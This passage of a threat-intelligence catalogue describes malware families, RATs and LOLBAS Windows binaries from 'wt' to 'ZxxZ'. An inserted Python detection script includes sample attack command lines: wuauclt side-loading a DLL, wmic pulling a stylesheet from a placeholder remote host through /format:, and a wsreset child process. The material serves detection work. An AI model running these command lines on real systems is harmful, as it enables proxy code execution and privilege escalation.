Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5179
source Tidal Cyber
tags ['291fab5d-e732-4b19-83e4-ee642b2ae0f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

wt

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Terminal

Author: Nasreddine Bencherchali

Paths: * C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_\wt.exe

Resources: * https://twitter.com/nas_bench/status/1552100271668469761

Detection: * Sigma: proc_creation_win_windows_terminal_susp_children.yml[wt.exe - LOLBAS Project]

Internal MISP references

UUID a34b303e-e8bb-48b2-85e0-f6e2620d68ab which can be used as unique global reference for wt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5184
source Tidal Cyber
tags ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

wuauclt

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Windows Update Client

Author: David Middlehurst

Paths: * C:\Windows\System32\wuauclt.exe

Resources: * https://dtm.uk/wuauclt/

Detection: * Sigma: net_connection_win_wuauclt_network_connection.yml * Sigma: proc_creation_win_lolbin_wuauclt.yml * Sigma: proc_creation_win_wuauclt_execution.yml * IOC: wuauclt run with a parameter of a DLL path * IOC: Suspicious wuauclt Internet/network connections[wuauclt.exe - LOLBAS Project]

Internal MISP references

UUID 06fe608d-a517-492f-8557-cfb820984146 which can be used as unique global reference for wuauclt in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5180
source Tidal Cyber
tags ['03f0e493-63ae-47b5-8353-238390a895a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.
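
The LOLBAS entries above for Wmic, winget, Wlrmdr, Wsl, Wsreset and wuauclt each list a process-creation IOC (a suspicious parent/child pairing or a tell-tale command-line argument). The Python below is an added example, not code from the LOLBAS project or Tidal Cyber: it turns those IOCs into predicates over Sysmon Event ID 1 style records (Image, ParentImage, CommandLine) and runs them over constructed sample events. The winget -m/--manifest switch and the wuauclt switches shown in the sample command line are assumptions taken from the write-ups linked in those entries, not from this page; the rules themselves key only on what the IOCs state (a DLL path, a local manifest, a URL or UNC path after /format:, and the parent process name).

```python
# Added example: detection logic for the process-creation IOCs listed in the
# Wmic, winget, Wlrmdr, Wsl, Wsreset and wuauclt LOLBAS entries above.
# Not code from the LOLBAS project or Tidal Cyber. Field names mirror Sysmon
# Event ID 1 (Image, ParentImage, CommandLine); all sample events are constructed.
import ntpath
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the created process (Sysmon Image)
    parent_image: str   # full path of the parent process (Sysmon ParentImage)
    command_line: str   # command line of the created process (Sysmon CommandLine)


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any OS."""
    return ntpath.basename(path).lower()


# One predicate per IOC on the page.

def wsreset_child(ev: ProcEvent) -> bool:
    """wsreset.exe launching a child process other than mmc.exe (UAC bypass)."""
    return _basename(ev.parent_image) == "wsreset.exe" and _basename(ev.image) != "mmc.exe"


def wlrmdr_child(ev: ProcEvent) -> bool:
    """wlrmdr.exe spawning any new process."""
    return _basename(ev.parent_image) == "wlrmdr.exe"


def wsl_child(ev: ProcEvent) -> bool:
    """Any child process of wsl.exe (noisy where WSL is in legitimate use)."""
    return _basename(ev.parent_image) == "wsl.exe"


def wuauclt_dll(ev: ProcEvent) -> bool:
    """wuauclt.exe run with a DLL path among its parameters."""
    return (_basename(ev.image) == "wuauclt.exe"
            and re.search(r"\.dll\b", ev.command_line, re.I) is not None)


def winget_manifest(ev: ProcEvent) -> bool:
    """winget.exe installing from a local manifest; the -m/--manifest switch is an assumption."""
    return (_basename(ev.image) == "winget.exe"
            and re.search(r"(?:^|\s)(?:--manifest|-m)(?:\s|$)", ev.command_line, re.I) is not None)


def wmic_remote_format(ev: ProcEvent) -> bool:
    """wmic.exe pulling a stylesheet from a URL or UNC path through /format:."""
    return (_basename(ev.image) == "wmic.exe"
            and re.search(r"/format:[\"']?(?:https?://|\\\\)", ev.command_line, re.I) is not None)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("wsreset_child", wsreset_child),
    ("wlrmdr_child", wlrmdr_child),
    ("wsl_child", wsl_child),
    ("wuauclt_dll", wuauclt_dll),
    ("winget_manifest", winget_manifest),
    ("wmic_remote_format", wmic_remote_format),
]


def evaluate(events: List[ProcEvent]) -> List[Tuple[str, str, str]]:
    """Return (rule name, process file name, command line) for every event a rule matches."""
    hits = []
    for ev in events:
        for name, pred in RULES:
            if pred(ev):
                hits.append((name, _basename(ev.image), ev.command_line))
    return hits


# Constructed sample telemetry: one suspicious and one expected event per binary.
# The wuauclt switches are assumed from the dtm.uk write-up linked in the entry.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wsreset.exe", "cmd.exe /c whoami"),
    ProcEvent(r"C:\Windows\System32\mmc.exe", r"C:\Windows\System32\wsreset.exe", "mmc.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wlrmdr.exe", "cmd.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wsl.exe", "cmd.exe"),
    ProcEvent(r"C:\Windows\System32\wuauclt.exe", r"C:\Windows\System32\cmd.exe",
              r"wuauclt.exe /UpdateDeploymentProvider C:\Users\Public\loader.dll /RunHandlerComServer"),
    ProcEvent(r"C:\Windows\System32\wuauclt.exe", r"C:\Windows\System32\svchost.exe", "wuauclt.exe /detectnow"),
    ProcEvent(r"C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe", r"C:\Windows\System32\cmd.exe",
              r"winget.exe install --manifest C:\Users\Public\tool.yaml"),
    ProcEvent(r"C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe", r"C:\Windows\explorer.exe",
              "winget.exe install Microsoft.PowerToys"),
    ProcEvent(r"C:\Windows\System32\wbem\wmic.exe", r"C:\Windows\System32\cmd.exe",
              'wmic.exe os get /format:"https://files.example.invalid/report.xsl"'),
    ProcEvent(r"C:\Windows\System32\wbem\wmic.exe", r"C:\Windows\System32\cmd.exe", "wmic.exe os get caption"),
]


if __name__ == "__main__":
    for rule, proc, cmd in evaluate(SAMPLE_EVENTS):
        print(f"{rule:20} {proc:12} {cmd}")
```

Run stand-alone, the script reports six hits and stays silent on the four expected events (wsreset spawning mmc.exe, wuauclt without a DLL argument, winget installing by package id, wmic without a remote /format: source). The parent-process rules for wsl.exe and wlrmdr.exe are the ones that need an allow-list before deployment; the wmic rule deliberately requires a URL or UNC path so that local stylesheet use does not fire it.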

XAgentOSX

XAgentOSX is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan. [XAgentOSX 2017]

Internal MISP references

UUID 6f411b69-6643-4cc7-9cbd-e15d9219e99c which can be used as unique global reference for XAgentOSX in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0161
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Xbash

Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[Unit42 Xbash Sept 2018]

Internal MISP references

UUID ab442140-0761-4227-bd9e-151da5d0a04f which can be used as unique global reference for Xbash in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Linux', 'Windows']
software_attack_id S0341
source MITRE
type ['malware']

xCaon

xCaon is an HTTP variant of the BoxCaon malware family that has been used by IndigoZebra since at least 2014. xCaon has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.[Checkpoint IndigoZebra July 2021][Securelist APT Trends Q2 2017]

Internal MISP references

UUID 11a0dff4-1dc8-4553-8a38-90a07b01bfcd which can be used as unique global reference for xCaon in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0653
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

xCmd

xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems. [xCmd]

Internal MISP references

UUID d943d3d9-3a99-464f-94f0-95aa7963d858 which can be used as unique global reference for xCmd in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0123
source MITRE
type ['tool']
Related clusters

To see the related clusters, click here.

xcopy

xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy command "creates files with the archive attribute set, whether or not this attribute was set in the source file".[xcopy Microsoft]

Internal MISP references

UUID 84954209-1e2a-48dd-ba17-0f015f6de3ef which can be used as unique global reference for xcopy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5019
source Tidal Cyber
tags ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']
Related clusters

To see the related clusters, click here.

XCSSET

XCSSET is a macOS modular backdoor that targets Xcode application developers. XCSSET was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[trendmicro xcsset xcode project 2020]

Internal MISP references

UUID 3672ecfa-20bf-4d69-948d-876be343563f which can be used as unique global reference for XCSSET in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['macOS']
software_attack_id S0658
source MITRE
tags ['4a457eb3-e404-47e5-b349-8b1f743dc657', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172']
type ['malware']

XMRig

XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".[U.S. CISA Trends June 30 2020]

Internal MISP references

UUID 1491c020-6449-48e7-8ebf-abf7b71fbc97 which can be used as unique global reference for XMRig in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5064
source Tidal Cyber
tags ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '291c006e-f77a-4c9c-ae7e-084974c0e1eb', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e']
type ['tool']
Related clusters

To see the related clusters, click here.

Xpack

According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".[U.S. CISA Zoho Exploits September 7 2023]

Internal MISP references

UUID 19e7e967-7d0a-4930-8ef9-11a43dcb081d which can be used as unique global reference for Xpack in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5048
source Tidal Cyber
tags ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']

XTunnel

XTunnel is a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee. [Crowdstrike DNC June 2016] [Invincea XTunnel] [ESET Sednit Part 2]

Internal MISP references

UUID 133136f0-7254-4cec-8710-0ab99d5da4e5 which can be used as unique global reference for XTunnel in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0117
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

Xwizard

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe

Author: Oddvar Moe

Paths:
* C:\Windows\System32\xwizard.exe
* C:\Windows\SysWOW64\xwizard.exe

Resources:
* http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/
* https://www.youtube.com/watch?v=LwDHX7DVHWU
* https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
* https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
* https://twitter.com/notwhickey/status/1306023056847110144

Detection:
* Sigma: proc_creation_win_lolbin_class_exec_xwizard.yml
* Sigma: proc_creation_win_lolbin_dll_sideload_xwizard.yml
* Elastic: execution_com_object_xwizard.toml
* Elastic: defense_evasion_unusual_process_network_connection.toml

[Xwizard.exe - LOLBAS Project]

Internal MISP references

UUID d5663ff2-904b-42d6-b4d8-672017d91de2 which can be used as unique global reference for Xwizard in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5181
source Tidal Cyber
tags ['c37d2f5f-91da-43c6-869e-192bf0e0ae90', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

YAHOYAH

YAHOYAH is a Trojan used by Tropic Trooper as a second-stage backdoor.[TrendMicro TropicTrooper 2015]

Internal MISP references

UUID 0844bc42-5c29-47c3-b1b3-6bfffbf1732a which can be used as unique global reference for YAHOYAH in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0388
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']
Related clusters

To see the related clusters, click here.

yty

yty is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. [ASERT Donot March 2018]

Internal MISP references

UUID e0962ff7-5524-4683-9b95-0e4ba07dccb2 which can be used as unique global reference for yty in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0248
source MITRE
tags ['16b47583-1c54-431f-9f09-759df7b5ddb7']
type ['malware']

Zebrocy

Zebrocy is a Trojan that has been used by APT28 since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [Palo Alto Sofacy 06-2018][Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018][CISA Zebrocy Oct 2020]

Internal MISP references

UUID e317b8a6-1722-4017-be33-717a5a93ef1c which can be used as unique global reference for Zebrocy in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0251
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

Zeroaccess

Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [Sophos ZeroAccess]

Internal MISP references

UUID 2f52b513-5293-4833-9c4d-b120e7a84341 which can be used as unique global reference for Zeroaccess in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
software_attack_id S0027
source MITRE
type ['malware']

ZeroT

ZeroT is a Trojan used by TA459, often in conjunction with PlugX. [Proofpoint TA459 April 2017] [Proofpoint ZeroT Feb 2017]

Internal MISP references

UUID f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd which can be used as unique global reference for ZeroT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0230
source MITRE
tags ['84615fe0-c2a5-4e07-8957-78ebc29b4635']
type ['malware']
Related clusters

To see the related clusters, click here.

Zeus Panda

Zeus Panda is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. It derives from the original Zeus banking Trojan, whose source code was leaked in 2011, allowing threat actors to use that code as a basis for new malware variants such as Zeus Panda. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.[Talos Zeus Panda Nov 2017][GDATA Zeus Panda June 2017]

Internal MISP references

UUID be8add13-40d7-495e-91eb-258d3a4711bc which can be used as unique global reference for Zeus Panda in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0330
source MITRE
tags ['4d767e87-4cf6-438a-927a-43d2d0beaab7']
type ['malware']

Zipfldr

This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.

Description: Compressed Folder library

Author: LOLBAS Team

Paths:
* c:\windows\system32\zipfldr.dll
* c:\windows\syswow64\zipfldr.dll

Resources:
* https://twitter.com/moriarty_meng/status/977848311603380224
* https://twitter.com/bohops/status/997896811904929792
* https://windows10dll.nirsoft.net/zipfldr_dll.html

Detection:
* Sigma: proc_creation_win_rundll32_susp_activity.yml

[Zipfldr.dll - LOLBAS Project]

Internal MISP references

UUID 34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8 which can be used as unique global reference for Zipfldr in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
owner TidalCyberIan
platforms ['Windows']
software_attack_id S5201
source Tidal Cyber
tags ['0d0098b4-e159-4502-973d-714011ba605f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207']
type ['tool']

ZLib

ZLib is a full-featured backdoor that was used as a second-stage implant during Operation Dust Storm since at least 2014. ZLib is malware and should not be confused with the legitimate compression library from which its name is derived.[Cylance Dust Storm]

Internal MISP references

UUID 1ac8d363-2903-43da-9c1d-2b28179638c8 which can be used as unique global reference for ZLib in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0086
source MITRE
type ['malware']

Zox

Zox is a remote access tool that has been used by Axiom since at least 2008.[Novetta-Axiom]

Internal MISP references

UUID 75dd9acb-fcff-4b0b-b45b-f943fb589d78 which can be used as unique global reference for Zox in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0672
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.

zwShell

zwShell is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.[McAfee Night Dragon]

Internal MISP references

UUID 49314d4e-dc04-456f-918e-a3bedfc3192a which can be used as unique global reference for zwShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0350
source MITRE
tags ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f']
type ['malware']

ZxShell

ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[FireEye APT41 Aug 2019][Talos ZxShell Oct 2014]

Internal MISP references

UUID eea89ff2-036d-4fa6-bbed-f89502c62318 which can be used as unique global reference for ZxShell in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S0412
source MITRE
tags ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59']
type ['malware']
Related clusters

To see the related clusters, click here.

ZxxZ

ZxxZ is a trojan written in Visual C++ that has been used by BITTER since at least August 2021, including against Bangladeshi government personnel.[Cisco Talos Bitter Bangladesh May 2022]

Internal MISP references

UUID 91e1ee26-d6ae-4203-a466-93c9e5019b47 which can be used as unique global reference for ZxxZ in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Windows']
software_attack_id S1013
source MITRE
type ['malware']
Related clusters

To see the related clusters, click here.